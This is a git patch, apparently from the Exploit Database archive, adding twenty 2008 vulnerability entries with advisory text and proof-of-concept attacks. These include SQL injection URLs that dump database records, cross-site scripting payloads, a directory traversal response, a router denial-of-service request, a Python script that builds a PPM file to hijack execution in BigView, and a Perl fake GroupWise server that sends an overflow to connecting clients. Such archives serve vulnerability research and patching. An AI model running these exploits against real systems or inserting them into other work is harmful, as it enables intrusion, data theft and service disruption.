From 2928ba603e0c234a7cad95a4614c98d50e2600f6 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 26 Feb 2014 04:27:36 +0000 Subject: [PATCH] Updated 02_26_2014 --- files.csv | 20 ++++ platforms/asp/webapps/31891.txt | 9 ++ platforms/cgi/webapps/31892.txt | 9 ++ platforms/hardware/dos/31884.txt | 9 ++ platforms/hardware/remote/31885.txt | 9 ++ platforms/hardware/remote/31886.txt | 9 ++ platforms/linux/remote/31887.txt | 14 +++ platforms/multiple/dos/31872.py | 50 ++++++++++ platforms/multiple/remote/31890.txt | 9 ++ platforms/novell/dos/31889.pl | 142 ++++++++++++++++++++++++++++ platforms/php/webapps/31880.txt | 9 ++ platforms/php/webapps/31881.txt | 9 ++ platforms/php/webapps/31882.txt | 9 ++ platforms/php/webapps/31883.txt | 12 +++ platforms/php/webapps/31888.txt | 13 +++ platforms/php/webapps/31893.txt | 7 ++ platforms/windows/dos/31876.xml | 14 +++ platforms/windows/dos/31877.xml | 11 +++ platforms/windows/dos/31878.xml | 11 +++ platforms/windows/dos/31879.xml | 9 ++ platforms/windows/remote/31873.xml | 11 +++ 21 files changed, 395 insertions(+) create mode 100755 platforms/asp/webapps/31891.txt create mode 100755 platforms/cgi/webapps/31892.txt create mode 100755 platforms/hardware/dos/31884.txt create mode 100755 platforms/hardware/remote/31885.txt create mode 100755 platforms/hardware/remote/31886.txt create mode 100755 platforms/linux/remote/31887.txt create mode 100755 platforms/multiple/dos/31872.py create mode 100755 platforms/multiple/remote/31890.txt create mode 100755 platforms/novell/dos/31889.pl create mode 100755 platforms/php/webapps/31880.txt create mode 100755 platforms/php/webapps/31881.txt create mode 100755 platforms/php/webapps/31882.txt create mode 100755 platforms/php/webapps/31883.txt create mode 100755 platforms/php/webapps/31888.txt create mode 100755 platforms/php/webapps/31893.txt create mode 100755 platforms/windows/dos/31876.xml create mode 100755 platforms/windows/dos/31877.xml create mode 100755 platforms/windows/dos/31878.xml create mode 100755 platforms/windows/dos/31879.xml create mode 100755 platforms/windows/remote/31873.xml diff --git a/files.csv b/files.csv index 9e839ef95..45a41f23a 100755 --- a/files.csv +++ b/files.csv @@ -28661,3 +28661,23 @@ id,file,description,date,author,platform,type,port 31869,platforms/asp/webapps/31869.txt,"i-pos Storefront 1.3 'index.asp' SQL Injection Vulnerability",2008-06-02,KnocKout,asp,webapps,0 31870,platforms/php/webapps/31870.pl,"Joomla! and Mambo Joo!BB 0.5.9 Component 'forum' Parameter SQL Injection Vulnerability",2008-06-02,His0k4,php,webapps,0 31871,platforms/asp/webapps/31871.txt,"Te Ecard 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-06-02,"Ugurcan Engyn",asp,webapps,0 +31872,platforms/multiple/dos/31872.py,"NASA Ames Research Center BigView 1.8 PNM File Stack-Based Buffer Overflow Vulnerability",2008-06-04,"Alfredo Ortega",multiple,dos,0 +31873,platforms/windows/remote/31873.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' 'ExtractCab' ActiveX Control Buffer Overflow Vulnerability",2008-06-03,"Dennis Rand",windows,remote,0 +31876,platforms/windows/dos/31876.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' 'StartApp' ActiveX Control Insecure Method Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0 +31877,platforms/windows/dos/31877.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' 'RegistryString' Buffer Overflow Vulnerability",2008-06-04,"Dennis Rand",windows,dos,0 +31878,platforms/windows/dos/31878.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' ActiveX Control Arbitrary File Creation Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0 +31879,platforms/windows/dos/31879.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' ActiveX Control Arbitrary File Delete Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0 +31880,platforms/php/webapps/31880.txt,"WyMIEN PHP 1.0 'index.php' Cross Site Scripting Vulnerability",2008-06-04,ZoRLu,php,webapps,0 +31881,platforms/php/webapps/31881.txt,"PHP Address Book 3.1.5 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-06-04,"CWH Underground",php,webapps,0 +31882,platforms/php/webapps/31882.txt,"SamTodo 1.1 'tid' Parameter Cross Site Scripting Vulnerability",2008-06-05,"David Sopas Ferreira",php,webapps,0 +31883,platforms/php/webapps/31883.txt,"SamTodo 1.1 'completed' Parameter Cross Site Scripting Vulnerability",2008-06-05,"David Sopas Ferreira",php,webapps,0 +31884,platforms/hardware/dos/31884.txt,"Linksys WRH54G 1.1.3 Wireless-G Router Malformed HTTP Request Denial of Service Vulnerability",2008-06-05,dubingyao,hardware,dos,0 +31885,platforms/hardware/remote/31885.txt,"F5 FirePass 6.0.2.3 /vdesk/admincon/webyfiers.php css_exceptions Parameter XSS",2008-06-05,nnposter,hardware,remote,0 +31886,platforms/hardware/remote/31886.txt,"F5 FirePass 6.0.2.3 /vdesk/admincon/index.php sql_matchscope Parameter XSS",2008-06-05,nnposter,hardware,remote,0 +31887,platforms/linux/remote/31887.txt,"ALFTP FTP Client 4.1/5.0 'LIST' Command Directory Traversal Vulnerability",2008-06-06,"Tan Chew Keong",linux,remote,0 +31888,platforms/php/webapps/31888.txt,"SchoolCenter 7.5 Multiple Cross Site Scripting Vulnerabilities",2008-06-06,Doz,php,webapps,0 +31889,platforms/novell/dos/31889.pl,"Novell GroupWise Messenger 2.0 Client Buffer Overflow Vulnerabilities",2008-07-02,"Francisco Amato",novell,dos,0 +31890,platforms/multiple/remote/31890.txt,"Diigo Toolbar and Diigolet Comment Feature HTML Injection and Information Disclosure Vulnerabilities",2008-06-20,"Ferruh Mavituna",multiple,remote,0 +31891,platforms/asp/webapps/31891.txt,"Real Estate Website 1.0 'location.asp' Multiple Input Validation Vulnerabilities",2008-06-09,JosS,asp,webapps,0 +31892,platforms/cgi/webapps/31892.txt,"Tornado Knowledge Retrieval System 4.2 'p' Parameter Cross Site Scripting Vulnerability",2008-06-10,Unohope,cgi,webapps,0 +31893,platforms/php/webapps/31893.txt,"Hot Links SQL-PHP Multiple Cross Site Scripting Vulnerabilities",2008-06-10,sl4xUz,php,webapps,0 diff --git a/platforms/asp/webapps/31891.txt b/platforms/asp/webapps/31891.txt new file mode 100755 index 000000000..b810f3620 --- /dev/null +++ b/platforms/asp/webapps/31891.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29612/info + +Real Estate Website is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Real Estate Website 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/PATH/location.asp?name="> http://www.example.com/PATH/location.asp?name=JosS&location=IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Namee%20from%20MSysObjects))='a',0,'done')%00 \ No newline at end of file diff --git a/platforms/cgi/webapps/31892.txt b/platforms/cgi/webapps/31892.txt new file mode 100755 index 000000000..a1c906b3b --- /dev/null +++ b/platforms/cgi/webapps/31892.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29626/info + +Tornado Knowledge Retrieval System is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Tornado Knowledge Retrieval System 4.2 is vulnerable; prior versions may also be affected. + +http://www.example.com/tornado/searcher.exe?v=root&p= \ No newline at end of file diff --git a/platforms/hardware/dos/31884.txt b/platforms/hardware/dos/31884.txt new file mode 100755 index 000000000..f8b92b4db --- /dev/null +++ b/platforms/hardware/dos/31884.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29570/info + +Linksys WRH54G Wireless-G Router is prone to a denial-of-service vulnerability because it fails to adequately handle malformed HTTP requests. As a result, memory becomes corrupted and the device's HTTP service will crash. + +Successful exploits will deny service to legitimate users. Given the nature of this issue, remote code execution may be possible, but this has not been confirmed. + +WRH54G firmware version 1.01.03 is vulnerable; other versions may also be affected. + +http://192.168.1.106/./front_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_page.asp \ No newline at end of file diff --git a/platforms/hardware/remote/31885.txt b/platforms/hardware/remote/31885.txt new file mode 100755 index 000000000..a8b2ee63d --- /dev/null +++ b/platforms/hardware/remote/31885.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29574/info + +F5 FirePass SSL VPN is prone to multiple cross-site request-forgery vulnerabilities because it fails to adequately sanitize user-supplied input. + +Exploiting these issues may allow a remote attacker to execute arbitrary actions in the context of the affected application. + +FirePass 6.0.2 hotfix 3 is vulnerable; other versions may also be affected. + +https://www.example.com/vdesk/admincon/webyfiers.php?a=css&click=1&css_exceptions=%22+onfocus%3Dalert%28%26quot%3BXSS1%26quot%3B%29+foo%3D%22&save_css_exceptions=Update \ No newline at end of file diff --git a/platforms/hardware/remote/31886.txt b/platforms/hardware/remote/31886.txt new file mode 100755 index 000000000..b0d6a48d5 --- /dev/null +++ b/platforms/hardware/remote/31886.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29574/info + +F5 FirePass SSL VPN is prone to multiple cross-site request-forgery vulnerabilities because it fails to adequately sanitize user-supplied input. + +Exploiting these issues may allow a remote attacker to execute arbitrary actions in the context of the affected application. + +FirePass 6.0.2 hotfix 3 is vulnerable; other versions may also be affected. + +https://www.example.com/vdesk/admincon/index.php?a=css&sub=sql&sql_matchscope=%22+onfocus%3Dalert%28%26quot%3BXSS2%26quot%3B%29+foo%3D%22&save_sql_matchscope=Update \ No newline at end of file diff --git a/platforms/linux/remote/31887.txt b/platforms/linux/remote/31887.txt new file mode 100755 index 000000000..cb333be61 --- /dev/null +++ b/platforms/linux/remote/31887.txt @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/29585/info + +ALFTP is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. This issue occurs in the FTP client. + +Exploiting this issue will allow an attacker to write arbitrary files to locations outside of the application's current directory. This could help the attacker launch further attacks. + +ALFTP 4.1 beta 2 (English) and 5.0 (Korean) are vulnerable; other versions may also be affected. + +Response to LIST (backslash): + +\..\..\..\..\..\..\..\..\..\testfile.txt\r\n + +Response to LIST (forward-slash): +/../../../../../../../../../testfile.txt\r\n \ No newline at end of file diff --git a/platforms/multiple/dos/31872.py b/platforms/multiple/dos/31872.py new file mode 100755 index 000000000..7df7af5ae --- /dev/null +++ b/platforms/multiple/dos/31872.py @@ -0,0 +1,50 @@ +source: http://www.securityfocus.com/bid/29517/info + +NASA Ames Research Center BigView is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. + +An attacker can exploit this issue to execute arbitrary code in the context of the application. Successful attacks will compromise the application and underlying computer. Failed exploit attempts will result in a denial of service. + +BigView 1.8 is vulnerable; other versions may also be affected. + +/----------- + +## BigView exploit +## Alfredo Ortega - Core Security Exploit Writers Team (EWT) +## Works against BigView "browse" revision 1.8 compiled on ubuntu 6.06 +Desktop i386 + +import struct +w = open("crash.ppm","wb") +w.write("""P3 +#CREATOR: The GIMP's PNM Filter Version +1.0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA""") +# This exploit is not trivial, because the function PPM::ppmHeader() +doesn't return inmmediately, and we must modify internal variables to +cause an overwrite of a C++ string destructor executed at the end of the +function to gain control of EIP +# PS.: Congrats for the Phoenix mars Lander! +for i in range(7): + w.write(chr(i)*4) +w.write("AA") +w.write(struct.pack(" \ No newline at end of file diff --git a/platforms/novell/dos/31889.pl b/platforms/novell/dos/31889.pl new file mode 100755 index 000000000..a0d5481d5 --- /dev/null +++ b/platforms/novell/dos/31889.pl @@ -0,0 +1,142 @@ +source: http://www.securityfocus.com/bid/29602/info + +Novell GroupWise Messenger is prone to two buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized buffer. + +Attackers can exploit these issues to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. + +Versions prior to Novell GroupWise Messenger 2.0.3 HP1 are vulnerable. + +#!/usr/bin/perl -w + +## +#Simple fake groupwise msn server. +#Date: 07/02/2008 +#[ISR] - www.infobyte.com.ar +#Author: Francisco Amato +## + +use strict; +use IO::Socket; +use Data::Dump qw(dump); + +my $port=8300; +my $conn="HTTP/1.0 200 \r\nDate: Sat, 12 Jan 2008 01:28:59 GMT\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n\n\0\20\0\0\0nnmFileTransfer\0\2\0\0\x000\0\n\0\t\0\0\0nnmQuery\0\2\0\0\x001\0\n\0\13\0\0\0nnmArchive\0\2\0\0\x001\0\n\0\24\0\0\0nnmPasswordRemember\0\2\0\0\x001\0\n\0\17\0\0\0nnmMaxContacts\0\4\0\0\x00150\0\n\0\16\0\0\0nnmMaxFolders\0\3\0\0\x0050\0\n\0\r\0\0\0nnmBroadcast\0\2\0\0\x001\0\n\0\23\0\0\0nnmPersonalHistory\0\2\0\0\x001\0\n\0\r\0\0\0nnmPrintSave\0\2\0\0\x001\0\n\0\17\0\0\0nnmChatService\0\2\0\0\x001\0\n\0\3\0\0\0CN\0\a\0\0\0ISR000\0\n\0\b\0\0\0Surname\0\6\0\0\0Amato\0\n\0\n\0\0\0Full Name\0\20\0\0\0Client Name \0\n\0\13\0\0\0Given Name\0\n\0\0\0Client \0\n\0\r\0\0\0nnmLastLogin\0\13\0\0\x001200112090\0\t\0\30\0\0\0NM_A_FA_CLIENT_SETTINGS\0\1\0\0\0\n\0\21\0\0\0Novell.AskToSave\0\2\0\0\x001\0\t\0\e\0\0\0NM_A_FA_INFO_DISPLAY_ARRAY\0\1\0\0\0\n\0\27\0\0\0Internet EMail Address\0\26\0\0\0xxxxx\@xxxxxxxx.com.xx\0\b\0\16\0\0\0NM_A_UD_BUILD\0\a\0\0\0\n\0\13\0\0\0NM_A_SZ_DN\x001\0\0\0CN=ISR000,OU=IT,OU=ISR_,OU=BA,OU=AR,O=INFOBYTEXX\0\t\0\24\0\0\0NM_A_FA_AU_SETTINGS\0\1\0\0\0\n\0\22\0\0\0nnmClientDownload\0\2\0\0\x000\0\b\0\22\0\0\0NM_A_UD_KEEPALIVE\0\n\0\0\0\n\0\24\0\0\0NM_A_SZ_RESULT_CODE\0\2\0\0\x000\0\n\0\27\0\0\0NM_A_SZ_TRANSACTION_ID\0\2\0\0\x001\0\0"; +my $resp="HTTP/1.0 200 \r\nDate: Fri, 04 Jan 2008 09:55:40 GMT\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n\n\0\24\0\0\0NM_A_SZ_RESULT_CODE\0\2\0\0\x000\0\n\0\27\0\0\0NM_A_SZ_TRANSACTION_ID\0\2\0\0\x00c0d3\0\0"; +my $crash="A"x5000; +#initial +&main; + +########################################################################## +# FUNCTION main +# RECEIVES +# RETURNS +# EXPECTS +# DOES application's startup +sub main { + + #ignore child's process + $SIG{CHLD} = 'IGNORE'; + + my $listen_socket = IO::Socket::INET->new(LocalPort => $port, + Listen => 10, + Proto => 'tcp', + Reuse => 1); + + die "Cant't create a listening socket: $@" unless $listen_socket; + + print "[ISR] www.infobyte.com.ar - Francisco Amato\n"; + print "[Groupwise Messager] Fake Server ready. Waiting for connections ... \n"; + + #esperar conexiones + while (my $connection = $listen_socket->accept){ + + my $child; + # crear el fork para salir + die "Can't fork: $!" unless defined ($child = fork()); + + #child + if ($child == 0){ + + #close socket + $listen_socket->close; + + #process request + &client($connection); + + exit 0; + } + #father + else{ + + warn "Connecton recieved ... ",$connection->peerhost,"\n"; + + #close connection + $connection->close(); + + } + } +} +########################################################################## +# FUNCTION client +# RECEIVES +# RETURNS +# EXPECTS +# DOES process client request +sub client{ + + my ($socket) = @_; + my $st=2; #initial code + + $|=1; + + my $rp; + my $data = <$socket>; + pdata($data); + if ($data =~ /POST \/login/){ + $data = <$socket>; + pdata($data); + $data = <$socket>; + pdata($data); + $data = <$socket>; + pdata($data); + printf $socket $conn; + pdata($conn,1); + while ($data = <$socket>){ #commands + if ($data =~ /POST \/setstatus/){ + + pdata($data); + $data = <$socket>; + pdata($data); + $data = <$socket>; + pdata($data); + + $rp=$resp; + $rp =~ s/c0d3/$st/g; + $rp .=$crash; + printf $socket $rp; + pdata($rp,1); + $st++; + + }else{ + pdata("ELSE -". $data); + } + } + } + close($socket); + +} +########################################################################## +# FUNCTION pdata +# RECEIVES +# RETURNS +# EXPECTS +# DOES debug information +sub pdata { + my ($data,$orden) =@_; + if ($orden){ + print "[SERVER] - "; + }else{ + print "[CLIENT] - "; + } + print dump($data) . "\n"; +} diff --git a/platforms/php/webapps/31880.txt b/platforms/php/webapps/31880.txt new file mode 100755 index 000000000..036160b76 --- /dev/null +++ b/platforms/php/webapps/31880.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29551/info + +WyMIEN PHP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +WyMIEN PHP 1.0RC2 is vulnerable; other versions may also be affected. + +http://www.example.com/WyMienphp1.0-RC2/WyMienphp/index.php?f=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31881.txt b/platforms/php/webapps/31881.txt new file mode 100755 index 000000000..994149009 --- /dev/null +++ b/platforms/php/webapps/31881.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29560/info + +PHP Address Book is prone to multiple cross-site scripting and SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied input. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +PHP-Address Book 3.1.5 is vulnerable; other versions may also be affected. + +http://www.example.com/view.php?id=-1 union select 1,2,3,id,firstname,lastname,7,address,mobile,10,11,12,email,14 from addressbook/* http://www.example.com/edit.php?id=-1 union select 1,2,3,id,firstname,lastname,7,address,mobile,10,11,12,email,14 from addressbook/* http://www.example.com/?group= http://www.example.com/index.php?group= \ No newline at end of file diff --git a/platforms/php/webapps/31882.txt b/platforms/php/webapps/31882.txt new file mode 100755 index 000000000..0bd9be4f4 --- /dev/null +++ b/platforms/php/webapps/31882.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29568/info + +SamTodo is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +SamTodo 1.1 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?go=main.taskeditor&tid=f29de7fa-6625-4e20-8a19-11c0f4d799f6[XSS]&mode=edit \ No newline at end of file diff --git a/platforms/php/webapps/31883.txt b/platforms/php/webapps/31883.txt new file mode 100755 index 000000000..a548f8284 --- /dev/null +++ b/platforms/php/webapps/31883.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/29569/info + +SamTodo is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +SamTodo 1.1 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?go=main.default&completed=1%22%3E%3Ch1%3Ef00bar%3C/h1%3E + +http://www.example.com/index.php?go=main.default&orderBy=taskComplete&ascDesc=DESC&completed=1%22%3E%3Ch1%3Ef00bar%3C/h1%3E + diff --git a/platforms/php/webapps/31888.txt b/platforms/php/webapps/31888.txt new file mode 100755 index 000000000..310e59353 --- /dev/null +++ b/platforms/php/webapps/31888.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/29591/info + +SchoolCenter is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/education/components/docmgr/default.php?sectiondetailid=2179&fileitem=477&catfilter=XSS +http://www.example.com/education/components/docmgr/default.php?sectiondetailid=#XSS +http://www.example.com/education/components/scrapbook/default.php?sectiondetailid=#XSS +http://www.example.com/education/district/district.php?sectiondetailid=#XSS +http://www.example.com/education/admin/XSS +http://www.example.com/education/components/XSS +http://www.example.com/education/components/whatsnew/default.php?sectiondetailid=#XSS \ No newline at end of file diff --git a/platforms/php/webapps/31893.txt b/platforms/php/webapps/31893.txt new file mode 100755 index 000000000..ba49bb4eb --- /dev/null +++ b/platforms/php/webapps/31893.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/29632/info + +Hot Links SQL-PHP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/path/search.php?search=[XSS] http://www.example.com/path/search.php?search='> http://www.example.com/path/report.php?id=[XSS] http://www.example.com/path/report.php?id='> http://www.example.com/path/reviews.php?action=review&id==[XSS] http://www.example.com/path/reviews.php?action=review&id='> http://www.example.com/path/reviews.php?action=rate&id=[XSS] http://www.example.com/path/reviews.php?action=rate&id='> \ No newline at end of file diff --git a/platforms/windows/dos/31876.xml b/platforms/windows/dos/31876.xml new file mode 100755 index 000000000..67a07280a --- /dev/null +++ b/platforms/windows/dos/31876.xml @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/29533/info + + +HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to an insecure-method vulnerability. + +Successfully exploiting this issue allows remote attackers to launch arbitrary applications with the privileges of the application running the ActiveX control (typically Internet Explorer). + +Note that if the attacker could place a malicious executable on the system, they would be able to launch it using this vulnerability. + +HP Instant Support 1.0.0.22 and earlier versions are affected. + +NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information. + + \ No newline at end of file diff --git a/platforms/windows/dos/31877.xml b/platforms/windows/dos/31877.xml new file mode 100755 index 000000000..2a689b2d8 --- /dev/null +++ b/platforms/windows/dos/31877.xml @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/29534/info + +HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. + +An attacker can exploit this issue to execute arbitrary code in the context of an application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions. + +HP Instant Support 1.0.0.22 and earlier versions are affected. + +NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information. + + \ No newline at end of file diff --git a/platforms/windows/dos/31878.xml b/platforms/windows/dos/31878.xml new file mode 100755 index 000000000..5fe898cbf --- /dev/null +++ b/platforms/windows/dos/31878.xml @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/29535/info + +HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to a vulnerability that lets attackers create and overwrite files with arbitrary, attacker-controlled content. + +Successful exploits may compromise affected computers and aid in further attacks. + +HP Instant Support 1.0.0.22 and earlier versions are affected. + +NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information. + + \ No newline at end of file diff --git a/platforms/windows/dos/31879.xml b/platforms/windows/dos/31879.xml new file mode 100755 index 000000000..37760b1db --- /dev/null +++ b/platforms/windows/dos/31879.xml @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29536/info + +HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to a vulnerability that lets attackers delete arbitrary files on the affected computer in the context of the application using the ActiveX control. Successful attacks can result in denial-of-service conditions. + +HP Instant Support 1.0.0.22 and earlier versions are affected. + +NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information. + + \ No newline at end of file diff --git a/platforms/windows/remote/31873.xml b/platforms/windows/remote/31873.xml new file mode 100755 index 000000000..cc4f2c6b5 --- /dev/null +++ b/platforms/windows/remote/31873.xml @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/29529/info + +HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. + +An attacker can exploit this issue to execute arbitrary code in the context of an application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions. + +HP Instant Support 1.0.0.22 and earlier versions are affected. + +NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information. + + \ No newline at end of file